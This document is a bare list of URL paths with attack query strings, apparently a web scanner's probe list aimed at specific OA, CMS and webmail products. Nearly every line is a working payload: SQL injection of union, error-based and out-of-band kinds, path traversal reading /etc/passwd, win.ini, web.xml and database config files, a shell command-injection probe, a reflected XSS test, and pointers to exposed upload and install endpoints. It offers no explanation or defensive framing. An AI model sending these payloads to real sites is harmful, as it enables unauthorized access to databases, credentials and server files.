/Website/OnlineSurveyResults.jsp?idhao=1'%20union%20all%20select%20null,chr(119)%7C%7Cchr(101)%7C%7Cchr(98)%7C%7Cchr(115)%7C%7Cchr(99)%7C%7Cchr(97)%7C%7Cchr(110)%7C%7Cchr(58)%7C%7Cchr(102)%7C%7Cchr(105)%7C%7Cchr(110)%7C%7Cchr(100)%7C%7Cchr(60)%20from%20sysibm.sysdummy1--
/frontProduct/search.ac
/Website/contentshow.jsp?ColumnCode=-12'%20union%20all%20select%20CHR(119)%7C%7CCHR(101)%7C%7CCHR(98)%7C%7CCHR(115)%7C%7CCHR(99)%7C%7CCHR(97)%7C%7CCHR(110)%7C%7CCHR(58)%7C%7CCHR(105)%7C%7CCHR(58)%7C%7CCHR(102)%7C%7CCHR(105)%7C%7CCHR(110)%7C%7CCHR(100)%20from%20DUAL%20--
/Website/newsshow.jsp?id=-12%20UNION%20%20ALL%20SELECT%20%20NULL,NULL,NULL,NULL,CHR(119)%7C%7CCHR(101)%7C%7CCHR(98)%7C%7CCHR(115)%7C%7CCHR(99)%7C%7CCHR(97)%7C%7CCHR(110)%7C%7CCHR(58)%7C%7CCHR(105)%7C%7CCHR(58)%7C%7CCHR(102)%7C%7CCHR(105)%7C%7CCHR(110)%7C%7CCHR(100),NULL,NULL,NULL,NULL%20FROM%20DUAL
/FileManages/NetworkDisk/QxSet1.aspx?id=38%20%20and+1=char(106)+--
/website/approve/convenientSiteAction!getSXList.action?department=1'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(119)%7C%7CCHR(101)%7C%7CCHR(98)%7C%7CCHR(115)%7C%7CCHR(99)%7C%7CCHR(97)%7C%7CCHR(110)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(102)%7C%7CCHR(105)%7C%7CCHR(110)%7C%7CCHR(100)))%20FROM%20DUAL)%20--&mill=488&style=4
/website/approve/approveSiteAction!listApproveModel.action?action=search&forward=searchmodel&issueTypename=&style=4&subType=1%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(119)%7C%7CCHR(101)%7C%7CCHR(98)%7C%7CCHR(115)%7C%7CCHR(99)%7C%7CCHR(97)%7C%7CCHR(110)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(102)%7C%7CCHR(105)%7C%7CCHR(110)%7C%7CCHR(100)))%20FROM%20DUAL)
/website/approve/approveSiteAction!findApproveGuide.action?businesscode=1'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(119)%7C%7CCHR(101)%7C%7CCHR(98)%7C%7CCHR(115)%7C%7CCHR(99)%7C%7CCHR(97)%7C%7CCHR(110)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(102)%7C%7CCHR(105)%7C%7CCHR(110)%7C%7CCHR(100)))%20FROM%20DUAL)%20--&location=&subcode=000
/bookdetail.aspx?id=-311%20union%20all%20Select%208%2CCHAR%28119%29%2bCHAR%28101%29%2bCHAR%2898%29%2bCHAR%28115%29%2bCHAR%2899%29%2bCHAR%2897%29%2bCHAR%28110%29%2bCHAR%2858%29%2bCHAR%28105%29%2bCHAR%2858%29%2bCHAR%28102%29%2bCHAR%28105%29%2bCHAR%28110%29%2bCHAR%28100%29%2C8%2C8%2C8%2C8%2C8%2C8%2C8%2C8%2C8%2C8%2C8%2C8%2C8%2C8%2C8%2C8%2C8%2C8%2C8%2C8--
/znSearchAction.do?searchContext=-1%25%27%20UNION%20%20ALL%20SELECT%20%20NULL%2CNULL%2CCHR%28119%29%7C%7CCHR%28101%29%7C%7CCHR%2898%29%7C%7CCHR%28115%29%7C%7CCHR%2899%29%7C%7CCHR%2897%29%7C%7CCHR%28110%29%7C%7CCHR%2858%29%7C%7CCHR%28105%29%7C%7CCHR%2858%29%7C%7CCHR%28102%29%7C%7CCHR%28105%29%7C%7CCHR%28110%29%7C%7CCHR%28100%29%2CNULL%20FROM%20DUAL%20--
/opac/ckgc.jsp?kzh=-1')%20UNION%20%20ALL%20SELECT%20%20NULL,NULL,CHR(119)%7C%7CCHR(101)%7C%7CCHR(98)%7C%7CCHR(115)%7C%7CCHR(99)%7C%7CCHR(97)%7C%7CCHR(110)%7C%7CCHR(58)%7C%7CCHR(105)%7C%7CCHR(58)%7C%7CCHR(102)%7C%7CCHR(105)%7C%7CCHR(110)%7C%7CCHR(100),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL%20FROM%20DUAL--
/cms/framework/dbfile/createdbfile.jsp
/CN/item/downloadFile.jsp?filedisplay=../../web-inf/web.xml
/servlet/com.runqian.base.util.ReadJavaScriptServlet?file=../../../../../../../../../../etc/passwd
/FileManages/FolderQxSet/FileModify.aspx?type=2&fileid=3%20and+1=char(106)%20--&path=/1
/interface/ugo.php?OA_USER=aa%2527%20and%201=(select%201%20from(select%20count(*),concat(0x7c,0x484B3A693A31393937,0x7c,floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x%20limit%200,1)a)%20and%20%25271%2527=%25271
/inc/finger/use_finger.php?USER_ID=-123%bf'%20and%20extractvalue(1,%20concat(0x5c,(select%200x5468696E6B3A693A646966666572656E74%20from%20%60user%60%20limit%201)))%23
/general/ems/query/search_excel.php?LOGIN_USER_ID=1%bf%27%20and%20extractvalue%281,%20concat%280x5c,%28select%200x5468696E6B3A693A646966666572656E74%20from%20%60user%60%20limit%201%29%29%29;%23&EMS_TYPE=1
/general/ems/manage/search_excel.php?LOGIN_USER_ID=1&EMS_TYPE=1%e5%27%20and%20extractvalue%281,%20concat%280x5c,%28select%200x5468696E6B3A693A646966666572656E74%20from%20%60user%60%20limit%201%29%29%29;%23
/backup/backup/backup.asp
/module/AIP/get_file.php?MODULE=/&ATTACHMENT_ID=.._webroot/inc/oa_config&ATTACHMENT_NAME=php
/general/mytable/intel_view/video_file.php?MEDIA_DIR=../../../inc/&MEDIA_NAME=oa_config.php
/admini/item/iteminfo.aspx
/admini/newstopic/newstopicinfo.aspx
/download?fileName=/WEB-INF/web.xml
/RecruitstuManage/schoolinfo/DetailTheme.aspx?type=-1&topicid=1'%20and%201=char(106)%20--
/index_lnlqcj.php
/main/model/childcatalog/fileFind.do?fcode=00103&title=-111%25%27%20union%20all%20select%20null%2CCHAR%2884%29%2bCHAR%2897%29%2bCHAR%28105%29%2bCHAR%2887%29%2bCHAR%2897%29%2bCHAR%28110%29%2bCHAR%2858%29%2bCHAR%28103%29%2bCHAR%28111%29%2bCHAR%2858%29%2bCHAR%28104%29%2bCHAR%28111%29%2bCHAR%28109%29%2bCHAR%28101%29%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull--&Submit=%CB%D1%CB%F7
/scrp/feedbackdetail.cfm?iSno=1%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(104)%7C%7CCHR(107)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(49)%7C%7CCHR(57)%7C%7CCHR(57)%7C%7CCHR(55)))%20FROM%20DUAL)
/poweb/CDHelp.jsp?ISOID=3'%20union%20all%20select%20null,null,null,null,null,null,null,null,null,null,null,null,null,null,char%28104%29%2bchar%28107%29%2bchar%2858%29%2bchar%2849%29%2bchar%2858%29%2bchar%2849%29%2bchar%2857%29%2bchar%2857%29%2bchar%2855%29,null,null,null%20%20--%20
/information/OA_InforList.asp
/information/OA_PingLun.asp?PLType=1&POAID=54'%20and+1=char(106)%20--
/information_manager/informationmanager_upload.jsp?upload=1&dispControl=null&saveControl=null
/public/jsp/multiuploadfile.jsp?path=information&mode=add&fileName=infoPicName&saveName=infoPicSaveName&tableName=infoPicTable&fileMaxSize=0&photos=null
/public/jsp/smartUploadPic.jsp?path=information&mode=add&fileName=infoPicName&saveName=infoPicSaveName&tableName=infoPicTable&fileMaxSize=0&fileMaxNum=0&fileType=gif,jpg,bmp,jspx,png&fileMinWidth=0&fileMinHeight=0&fileMaxWidth=0&fileMaxHeight=0
/jdwz/qtpage/findAllPoint.jsp?dtcxlb=vcsfjg&point_name=1%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CCHAR%2884%29%2bCHAR%2897%29%2bCHAR%28105%29%2bCHAR%2887%29%2bCHAR%2897%29%2bCHAR%28110%29%2bCHAR%2858%29%2bCHAR%28103%29%2bCHAR%28111%29%2bCHAR%2858%29%2bCHAR%28104%29%2bCHAR%28111%29%2bCHAR%28109%29%2bCHAR%28101%29%2CNULL--%20&vcsfjg=all
/jdwz/newsAction.do?flag=flag&NewsId=-12'%20union%20all%20select%20CHAR%2884%29%2bCHAR%2897%29%2bCHAR%28105%29%2bCHAR%2887%29%2bCHAR%2897%29%2bCHAR%28110%29%2bCHAR%2858%29%2bCHAR%28103%29%2bCHAR%28111%29%2bCHAR%2858%29%2bCHAR%28104%29%2bCHAR%28111%29%2bCHAR%28109%29%2bCHAR%28101%29,12,12,12,12,12,12,12,12--
/caigou/NoticeList.aspx?Type=%27%2b+(select+convert(int%2cCHAR(106)%2bCHAR(105)%2bCHAR(120))+FROM+syscolumns)+%2b%27
/MailExportDo.asp?dellist=-1234%29%20or%203438%3DCONVERT%28INT%2C%28SELECT%20CHAR%28119%29%2bCHAR%28101%29%2bCHAR%2898%29%2bCHAR%28115%29%2bCHAR%2899%29%2bCHAR%2897%29%2bCHAR%28110%29%2bCHAR%2858%29%2b%28SELECT%20%28CASE%20WHEN%20%288986%3D8986%29%20THEN%20CHAR%28105%29%20ELSE%20CHAR%2848%29%20END%29%29%2bCHAR%2858%29%2bCHAR%28102%29%2bCHAR%28105%29%2bCHAR%28110%29%2bCHAR%28100%29%29%29%20%20AND%20%281602%3D1602
/mailClassInfor.asp
/MessageInfoDis.asp?VOID=26%20and%201122%3DCONVERT%28INT%2C%28SELECT%20CHAR%2884%29%2bCHAR%2897%29%2bCHAR%28105%29%2bCHAR%2887%29%2bCHAR%2897%29%2bCHAR%28110%29%2bCHAR%2858%29%2bCHAR%28103%29%2bCHAR%28111%29%2bCHAR%2858%29%2bCHAR%28104%29%2bCHAR%28111%29%2bCHAR%28109%29%2bCHAR%28101%29%29%29%20--
/Include/DepartmentSet_Right.aspx?BI_ID=1'%20and%20(select%2b(char(106)%2bchar(120)%2bchar(106)%2bchar(120)))%3E0--
/jcms/m_1_9/user/down.jsp?pathfile=../jcms/m_1_9/user/down.jsp
/tophp.asp
/Manage/CalendarMemo/event.ashx
/RuvarHRM/web_common/file_download.aspx?hr_file_storage_id=1')%20and%20(select%20char(106)%2bchar(106))%3E0--
/SysManage/bbsSet/BoardInfo.aspx?board_id=-1'%20and%20(select%20char(106)%2bchar(106))%3E0--&level=1
/SysManage/include/SelectUnderling.aspx?u_underling=(select%20char(106)%2bchar(106)))--'
/SysManage/MailSet/select_mail.aspx?corp_id=(select%20char(106)%2bchar(106))%20--
/workflow/OfficeFileDownload.aspx?filename=1'%20and%20(select%20char(106)%2bchar(106))%3E0%20--
/SysManage/get_department.aspx?corpID=char(106)%2bchar(106)
/SysManage/role_setting_new.aspx?id=char(106)%2bchar(106)
/resource/jpk/search.jsp?coursetype=0&applyyear=0&university=%CF%C3%C3%C5%B4%F3%D1%A7&subject1=0&subject2=0&name=%25%27%20AND%201122%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%28104%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%281122%3D1122%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%2849%29%7C%7CCHR%2857%29%7C%7CCHR%2857%29%7C%7CCHR%2855%29%29%29%20FROM%20DUAL%29%20AND%20%27%25%27%3D%27
/oa/download_attach.aspx?attach_id=1'%20and%20(select%20char(106)%2bchar(106))%3E0--
/SysManage/departmentset_corpshow.aspx?bi_id=1'%20and%20(select%20char(106)%2bchar(106))%3E0--
/SysManage/role_show.aspx?role_id=char(106)%2bchar(106)
/lates/index.html?username=123%27%2f%2a%2a%2fand%2f%2a%2a%2f%28seleselectct%2f%2a%2a%2f1%2f%2a%2a%2ffrom%2f%2a%2a%2f%28selselectect%2f%2a%2a%2fcount%28%2a%29%2Cconcat%280x7c%2C0x7765627363616E3A693A66696E64%2C0x7c%2Cfloor%28rand%280%29%2a2%29%29x%2f%2a%2a%2ffrom%2f%2a%2a%2finformation_schema.tables%2f%2a%2a%2fgroup%2f%2a%2a%2fby%2f%2a%2a%2fx%29a%29%23
/kaoqin/JiaoYanDis.asp
/admin/accounts_list.aspx?u_department_id=1'%20and%20(char(106)%2bchar(106))%3E0--
/tj/list.aspx?typeid=1'%20and%20(char(106)%2bchar(106))%3E0--
/filemanage/FolderPower.aspx?folder=1'%20and%20(char(106)%2bchar(106))%3E0--
/OperationManage/ViewSecrecyGuestBookMessage.aspx?sn=-12'%20and%20(char(106)%2bchar(106))%3E0--&sp=amdin&oid=0&type=2
/Manage/CalendarMemo/load.ashx
/php/report/include/ldap.inc
/php/report/include/util.inc
/php/report/include/config.inc
/php/report/lastlogin_list_export.php?time=1%20and%201=2%20union%20select%20md5(1122),2,3%20--%20&stime=hehe
/user/storage_explore.php
/grad/admin/domain_logo.php
/user/storage_fold_explore.php
/php/mailaction1.php?action=x&index=1.2;echo+123456%3Ex1.txt
/user/send_queue/upload_addition.php
/php/report/search_lastlogin.php?time=1%20and%201=2%20union%20select%20md5(1122),2,3%20--%20&stime=hehe
/php/bill/list_userinfo.php?domain=site.org&ok=1&cp=1%20union%20select%20md5(1122),2,3,4,5%23
/grad/admin/admin_logo_upload.php
/common/codewidget.jsp?code=1'%20AND%201=char(106)%20--
/download.ashx?files=../web.config
/mailmain?type=login&uid=sec_sj&pwd=&domain=root&style=enterprise
/?question/search/%27%75nion%20select%201,2,3,4,5,6,7,8,md5(1122),10,11,12,13,14,15,16,17,18,19,20%23
/jcms/m_1_9/user/down.jsp?abspathfile=/etc/passwd
/Edit/ShowEdit.aspx?Dir=../../&OpenWords=TxtTagKey
/jis/manage/databak/showlog.jsp?path=../showlog.jsp
/download.jsp?path=UserFiles/../download.jsp
/tt/trade/register.asp?step=checkdup&checkname=ologinname&checkval=haha'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(104)%7C%7CCHR(107)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(49)%7C%7CCHR(57)%7C%7CCHR(57)%7C%7CCHR(55)))%20FROM%20DUAL)%20--&pk=0
/zwgkinfo/DepartMentInfoList.aspx?CategoryNum=-12'/**/and/**/1=char(106)--&DeptCode=
/jis/interface/offer.jsp?flag=user
/jis/down.jsp?pathfile=./down.jsp%00.jpg
/MockLogin.aspx
/mobile/user.php?act=order_list
/seeyon/management/status.jsp
/api/download.ashx?fid=nUDWEgdorSH4j/+9GiQTlA==
/monitoring?part=web.xml
/?/s_tag/hehe%25%27%20union%20select%201,2,3,md5(1122),5,6,7%20from%20go_admin%23
/download.action?fullPath=./WEB-INF/web.xml
/jcms/workflow/design/readxml.jsp?flowcode=../../../WEB-INF/config/dbconfig
/jis/update/update.jsp?fn_billstatus=U
/install/install.php
/public/minify.php?f=../ooxxooxxo/hehe.js
/admin/index.asp
/plus/outside.php?id=../template/default/style/yun_index.css%00
/productpic.aspx?id=100611)%20and%201=char(106)%20--
/jsp/util/file_download.jsp?filePath=../../../../../../../etc/passwd
/jsp/util/file_download.jsp?filePath=c:%5Cwindows%5Cwin.ini%00.xml
/jcms/m_5_5/m_5_5_3/import.jsp
/upload!uploadImg.action
/AuthReturn.aspx?APTokenResponse=a$8SOIYyiGVYBge5mdoY5nIeAueY7BixUtLdHqpy8o3RqM9hVnisaXAA==
/?do=index&mod=goods
/index.php/*123*/'union/**/select/**/1,2,3,4,5,6,7,8,md5(1122),10,11%23&action=getatlbyid
/cart.aspx?act=spikebuy&spikeid=3%20and%201=char(106)%2bchar(120)%20--
/webmail/client/mail/index.php?module=operate&action=down&file=./../../mainconfig.php
/MoreIndex.aspx?pkId=6434&kw=a'%20and%201=char(106)%20--&st=2&t=1
/RuvarHRM/web_include/select_baseinfo.aspx?bt_name=1')%20%20and%20(char(106)%2bchar(106))%3E0--
/Default.aspx?item=1)%20and%201=(char(106)%2bchar(106))%20--
/news/searchNewsAction.shtml?keywords='%7C%7C(SELECT%20'ijx'%20FROM%20DUAL%20WHERE%201122=1122%20AND%204567=UTL_INADDR.GET_HOST_ADDRESS((SELECT%20chr(119)%7C%7Cchr(101)%7C%7Cchr(98)%7C%7Cchr(115)%7C%7Cchr(99)%7C%7Cchr(97)%7C%7Cchr(110)%7C%7Cchr(58)%7C%7Cchr(105)%7C%7Cchr(58)%7C%7Cchr(102)%7C%7Cchr(105)%7C%7Cchr(110)%7C%7Cchr(100)%20FROM%20dual)))%7C%7C'
/zwfw/zwfwInfoAction!execute.shtml?action=5&sid='%7C%7C(SELECT%20'ijx'%20FROM%20DUAL%20WHERE%201122=1122%20AND%204567=UTL_INADDR.GET_HOST_ADDRESS((SELECT%20chr(119)%7C%7Cchr(101)%7C%7Cchr(98)%7C%7Cchr(115)%7C%7Cchr(99)%7C%7Cchr(97)%7C%7Cchr(110)%7C%7Cchr(58)%7C%7Cchr(105)%7C%7Cchr(58)%7C%7Cchr(102)%7C%7Cchr(105)%7C%7Cchr(110)%7C%7Cchr(100)%20FROM%20dual)))%7C%7C'
/news/newsInfoAction.shtml?infotype=-1'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(104)%7C%7CCHR(107)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(49)%7C%7CCHR(57)%7C%7CCHR(57)%7C%7CCHR(55)))%20FROM%20DUAL)%20and%20'at'='at
/client/checkuser.aspx?user=test'%20and%20char(106)%3E0--&pwd=1
/siteserver/userRole/modal_sendMail.aspx?From=User&UserNameCollection=test'+and+char(106)%2bchar(106)=0%20--
/admin/include/config.php?depth=../../templates/default/images/css/metinfo.css%00
/admin/login/login_check.php?depth=../../templates/default/images/css/metinfo.css%00&admin_index=1
/admin/system/lang/lang.func.php?depth=../../../public/js/public.js%00
/webusr/check.aspx?loginname=nosec'%20and%201=char(106)%2bchar(106)%20--%20
/plugins/phpdisk_client/client_sub.php?action=upload_file
/ExhibitionCenter.aspx?area=-12'%20and/**/1=char(106)/**/--
/SupplyList.aspx?parentid=88&classid=-12%20and/**/1=char(106)/**/%20--%20
/company/SearchProducts.aspx?id=115&keyname=ppp%25'%20and/**/1=char(106)/**/%20--%20
/Web/Login.aspx
/Web/KeySearch.aspx?searchid=1234
/portal/admin/setright.aspx?id=-1
/infolist.aspx?ClassId=5)%20and%201122=CONVERT(INT,(SELECT%20CHAR(84)%2bCHAR(97)%2bCHAR(105)%2bCHAR(87)%2bCHAR(97)%2bCHAR(110)%2bCHAR(58)%2bCHAR(103)%2bCHAR(111)%2bCHAR(58)%2bCHAR(104)%2bCHAR(111)%2bCHAR(109)%2bCHAR(101)))%20AND%20(1=1
/guestbook.aspx?do=show&id=1%20union%20all%20select%20null,null,null,null,null,null,null,null,null,null,null,char(106)%2bchar(106)%2bchar(108)%20--
/prog/filedown.php?pe_id=MQ==
/emlib4/system/DataSource/GetDataGridCtrlResult.aspx?_debug_=undefined
/emlib4/format/release/aspx/eml_userwh.aspx
/voteresult.aspx?activeid=-1%20UNION%20SELECT%201,char(106)%2bchar(106),3,4,5%20from%20syscolumns%20--
/kbase_list.aspx?kcatid=1%20UNION%20SELECT%201,2,char(106)%2bchar(106),4,5,6,7,8%20from%20syscolumns--
/getTopLinksPortalCategoriesAction.action?siteId=../../../../../../../../../../windows/win.ini%00.jpg
/letter/letter_detail.aspx?id=8'%20%20and+1=char(106)%2bchar(106)%20--
/cms/infopub/rss.jsp?channelcode=-A%27%20union%20all%20select%20char%28106%29%2bchar%28106%29%2Cnull%2Cnull%2Cnull%20--&maxnum=20
/web/doc_hit.jsp?documentid=-21%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(104)%7C%7CCHR(107)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(49)%7C%7CCHR(57)%7C%7CCHR(57)%7C%7CCHR(55)))%20FROM%20DUAL)
/OperationManage/BlogMoreIndex.aspx?pkId=&blogId=1&kw=abc'%20and%201=char(106)%20--&st=1&t=1
/Tools/stream/FlvStream.ashx?file=./Index.aspx
/tj/total.aspx?act=other&typeid=1%27%20AND%209518%3DCONVERT%28INT%2C%28SELECT%20char%28119%29%2bchar%28101%29%2bchar%2898%29%2bchar%28115%29%2bchar%2899%29%2bchar%2897%29%2bchar%28110%29%2bchar%2858%29%2bchar%28105%29%2bchar%2859%29%2bchar%28102%29%2bchar%28105%29%2bchar%28110%29%2bchar%28100%29%2b%28SELECT%20%28CASE%20WHEN%20%289518%3D9518%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%2bCHAR%28100%29%29%29%29%20AND%20%27xhJK%27%3D%27xhJK
/webConfigSet/configSetting.aspx?url=/login/index.aspx
/cms/cms/infopub/gjjs.jsp?pubtype=S&pubpath=dkt&startdate=&enddate=&topic=&content=&authorname=&origin=&description=&webappcode=A02&searchdir=A02&templetid=-21'%20union%20all%20select%20char(106)%2bchar(62)%2bchar(60),null,null%20--
/mydocument/download.aspx
/prog/get_passwd_1.php?user=hehe%3Cscript%3Ealert(42873)%3C/script%3E%20
/cjwtlist.aspx?t=(select+convert(int%2c@@version))
/FormBuilder/PrintFormList.aspx?file_id=1)/**/UNION/**/ALL/**/SELECT/**/CHR(97)%7C%7CCHR(60)%7C%7CCHR(99),NULL/**/FROM/**/DUAL/**/--
/module/sitesearch/index.jsp?keyword=&columnid=-1650)%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,NULL,NULL,NULL,NULL,chr(119)%7C%7Cchr(101)%7C%7Cchr(98)%7C%7Cchr(115)%7C%7Cchr(99)%7C%7Cchr(97)%7C%7Cchr(110)%7C%7Cchr(58)%7C%7Cchr(105)%7C%7Cchr(58)%7C%7Cchr(102)%7C%7Cchr(105)%7C%7Cchr(110)%7C%7Cchr(100),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL%20FROM%20DUAL--%20&keyvalue=&webid=&currpage=2
/FormBuilder/yjzxList.aspx?id=1/**/UNION/**/ALL/**/SELECT/**/NULL,NULL,CHR(106)%7C%7CCHR(60)%7C%7CCHR(106)/**/FROM/**/DUAL--
/FromBaoShan/LaborSpecial/PlacardView.aspx?info_id=1/**/UNION/**/ALL/**/SELECT/**/CHR(106)%7C%7CCHR(106)%7C%7CCHR(106),NULL,NULL,NULL/**/FROM/**/DUAL--
/goods/GoodsAdd.aspx?goodsid=1/**/AND/**/1122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(104)%7C%7CCHR(107)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(49)%7C%7CCHR(57)%7C%7CCHR(57)%7C%7CCHR(55)))%20FROM%20DUAL)&flag=2
/pub/search/search_video_view.asp?id=3&mid=4%20and%201122=CONVERT(INT,(SELECT%20char%28119%29%2bchar%28101%29%2bchar%2898%29%2bchar%28115%29%2bchar%2899%29%2bchar%2897%29%2bchar%28110%29%2bchar%2858%29%2bchar%28105%29%2bchar%2859%29%2bchar%28102%29%2bchar%28105%29%2bchar%28110%29%2bchar%28100%29))&yh=1
/index.php?act=ajax&do=datacall&in_ajax=1&m=index&op=get_datacall
/main/findgbm2.asp?sql=SELECT+char%28106%29%2Bchar%28106%29%2Bchar%28106%29+FROM+Master%2E%2ESysDatabases+ORDER+BY+Name&sqlbak=SELECT+char%28106%29%2Bchar%28106%29%2Bchar%28106%29+FROM+Master%2E%2ESysDatabases+ORDER+BY+Name%20&px=
/ebsys/fceform/common/djframe.htm?isfile=release&djsn=eb_runsql
/nameedit.asp?table=bbs&id=1%20union%20all%20select%20null,null,null,null,char(119)%2bchar(101)%2bchar(98)%2bchar(115)%2bchar(99)%2bchar(97)%2bchar(110)%2bchar(58)%2bchar(105)%2bchar(59)%2bchar(102)%2bchar(105)%2bchar(110)%2bchar(100),null%20--&action=edit
/jis/front/sdgs/updateuser.jsp
/lm/down.jsp?pathfile=down.jsp
/website/dflz/dflzCjAction!caiwugk_list.action?orgCode=&orgName=&zuOrgCode=&zuOrgName=&cwgkbbh=-21'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(104)%7C%7CCHR(107)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(49)%7C%7CCHR(57)%7C%7CCHR(57)%7C%7CCHR(55)))%20FROM%20DUAL)%20--%20&cwgkbmc=
/Documents/FolderInfor.asp?POAID=0'%20or%201122=CONVERT(INT,(SELECT%20char(119)%2bchar(101)%2bchar(98)%2bchar(115)%2bchar(99)%2bchar(97)%2bchar(110)%2bchar(58)%2bchar(105)%2bchar(59)%2bchar(102)%2bchar(105)%2bchar(110)%2bchar(100)))%20--&Source=0
/Documents/FolderInfor.asp?OAID=0%20or%201122=CONVERT(INT,(SELECT%20char(119)%2bchar(101)%2bchar(98)%2bchar(115)%2bchar(99)%2bchar(97)%2bchar(110)%2bchar(58)%2bchar(105)%2bchar(59)%2bchar(102)%2bchar(105)%2bchar(110)%2bchar(100)))%20--&Source=0
/meetingroom/MeetingRoom_UseInfo.asp
/lm/front/api/opr_datacall.jsp?fn_billstatus=E&vc_id=-12'%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,char(119)%2bchar(101)%2bchar(98)%2bchar(115)%2bchar(99)%2bchar(97)%2bchar(110)%2bchar(58)%2bchar(105)%2bchar(59)%2bchar(102)%2bchar(105)%2bchar(110)%2bchar(100),NULL,NULL,NULL,NULL,NULL--
/downloadFile.action?path=index.jsp
/portal/getJsonData.action?userId=9090&ruleID=portal-common.getProFileInfo
/lm/front/noontimelist.jsp?flag=a&start=1&end=2&sysid=2'%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,NULL,chr(119)%7C%7Cchr(101)%7C%7Cchr(98)%7C%7Cchr(115)%7C%7Cchr(99)%7C%7Cchr(97)%7C%7Cchr(110)%7C%7Cchr(58)%7C%7Cchr(105)%7C%7Cchr(58)%7C%7Cchr(102)%7C%7Cchr(105)%7C%7Cchr(110)%7C%7Cchr(100),NULL%20FROM%20DUAL%20--&groupid=4
/php/bill/print_addfeelog.php
/objectbox/selectx_userlist.jsp?fn_Keywords=1'%20UNION%20ALL%20SELECT%20NULL,char(119)%2bchar(101)%2bchar(98)%2bchar(115)%2bchar(99)%2bchar(97)%2bchar(110)%2bchar(58)%2bchar(105)%2bchar(59)%2bchar(102)%2bchar(105)%2bchar(110)%2bchar(100),NULL--%20&perm=&cPage=1&tiao=
/meetingroom/ShenQingInforDis.asp?OAID=-12%20AND%201993%20IN%20(char(119)%2bchar(101)%2bchar(98)%2bchar(115)%2bchar(99)%2bchar(97)%2bchar(110)%2bchar(58)%2bchar(105)%2bchar(59)%2bchar(102)%2bchar(105)%2bchar(110)%2bchar(100))%20---
/information/oa_infordislist.asp?class=1%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,NULL,NULL,NULL,char(119)%2bchar(101)%2bchar(98)%2bchar(115)%2bchar(99)%2bchar(97)%2bchar(110)%2bchar(58)%2bchar(105)%2bchar(59)%2bchar(102)%2bchar(105)%2bchar(110)%2bchar(100),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--
/information/OA_Condition.asp?class=1&subclass=(CONVERT(INT,(SELECT%20CHAR(119)%2bCHAR(101)%2bCHAR(98)%2bCHAR(115)%2bCHAR(99)%2bCHAR(97)%2bCHAR(110)%2bCHAR(58)%2bCHAR(105)%2bCHAR(59)%2bCHAR(102)%2bCHAR(105)%2bCHAR(110)%2bCHAR(100))))---
/message/mytreedata.asp?bumenid=-12%20AND%201432=CONVERT(INT,(SELECT%20CHAR(119)%2bCHAR(101)%2bCHAR(98)%2bCHAR(115)%2bCHAR(99)%2bCHAR(97)%2bCHAR(110)%2bCHAR(58)%2bCHAR(105)%2bCHAR(59)%2bCHAR(102)%2bCHAR(105)%2bCHAR(110)%2bCHAR(100)))--%20&time=&time=
/house/upload/upload.asp
/sbweb/Upload_Save_2.asp
